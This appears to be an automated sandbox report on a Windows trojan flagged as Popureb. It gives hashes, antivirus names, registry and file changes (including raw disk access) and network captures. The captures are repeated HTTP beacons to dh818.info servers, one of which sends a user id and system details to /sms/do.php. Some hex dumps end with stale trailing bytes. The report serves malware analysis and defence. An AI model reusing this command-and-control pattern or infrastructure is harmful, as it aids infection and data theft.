Analysis Date2013-10-25 18:57:13
MD53f435e00dd6267f526dfeac8275e6a93
SHA15ccd765a88c0f4a005330b97b01d896302d23ef4

Static Details:

PEhashc9349374960418540073ffa141aef683c5a4e858
AVmsseTrojan:Win32/Popureb.C
AVavgGeneric22.AXB
AVclamavTrojan.Onlinegames-2021
AVaviraTR/Hijacker.Gen

Runtime Details:

Screenshot

Process
↳ C:\malware.bin

Creates ProcessC:\malware.bin

Process
↳ C:\malware.bin

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FilePHYSICALDRIVE0
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\All Users\Documents\My Videos\PulgFile.log
Creates File\Device\Afd\Endpoint
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates MutexIE_2011_Mutex
Winsock DNS2.dh818.info
Winsock DNS1.dh818.info

Network Details:

DNS1.dh818.info
Type: A
82.98.86.174
DNS2.dh818.info
Type: A
82.98.86.174
HTTP GEThttp://1.dh818.info:83/2//Logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/2/Pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/2//Logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/2/Pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/2//Logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/2/Pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/2//Logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/2/Pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/2//Logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/2/Pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/2//Logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/2/Pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/2//Logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/2/Pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1033 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1034 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1035 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1036 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1037 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1038 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1039 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1040 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1041 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1042 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1043 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1044 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1045 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1046 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1047 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1048 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1049 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1050 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1051 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1052 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1053 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1054 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1055 ➝ 82.98.86.174:83

Raw Pcap
0x00000000 (00000)   47455420 2f322f2f 4c6f676f 2e676966   GET /2//Logo.gif
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2031 2e646838 31382e69   .Host: 1.dh818.i
0x000000b0 (00176)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a                                  ..

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f50 6f702e67 69662048   GET /2/Pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f2f 4c6f676f 2e676966   GET /2//Logo.gif
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2031 2e646838 31382e69   .Host: 1.dh818.i
0x000000b0 (00176)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a6c6c 612f342e 30202863 6f6d7061   ..lla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f50 6f702e67 69662048   GET /2/Pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a 31333920   ep-Alive....139 
0x00000150 (00336)   33313331 32363633 2020203d 30267061   31312663   =0&pa
0x00000160 (00352)   7569643d 31313931 3126630a            uid=11911&c.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f2f 4c6f676f 2e676966   GET /2//Logo.gif
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2031 2e646838 31382e69   .Host: 1.dh818.i
0x000000b0 (00176)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a6c6c 612f342e 30202863 6f6d7061   ..lla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a 31333920   ep-Alive....139 
0x00000150 (00336)   33313331 32363633 2020203d 30267061   31312663   =0&pa
0x00000160 (00352)   7569643d 31313931 3126630a            uid=11911&c.

0x00000000 (00000)   47455420 2f322f50 6f702e67 69662048   GET /2/Pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)   30292020 20323035 37363936 65203634   0)   2057696e 64
0x000000e0 (00224)   36663737 37332032 30346535 34323020   6f7773 204e5420 
0x000000f0 (00240)   33353265 33313362 20202020 57696e64   352e313b    Wind
0x00000100 (00256)   6f777320 4e542035 2e313b0a            ows NT 5.1;.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f2f 4c6f676f 2e676966   GET /2//Logo.gif
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2031 2e646838 31382e69   .Host: 1.dh818.i
0x000000b0 (00176)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a6c6c 612f342e 30202863 6f6d7061   ..lla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a 31333920   ep-Alive....139 
0x00000150 (00336)   33313331 32363633 2020203d 30267061   31312663   =0&pa
0x00000160 (00352)   7569643d 31313931 3126630a            uid=11911&c.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
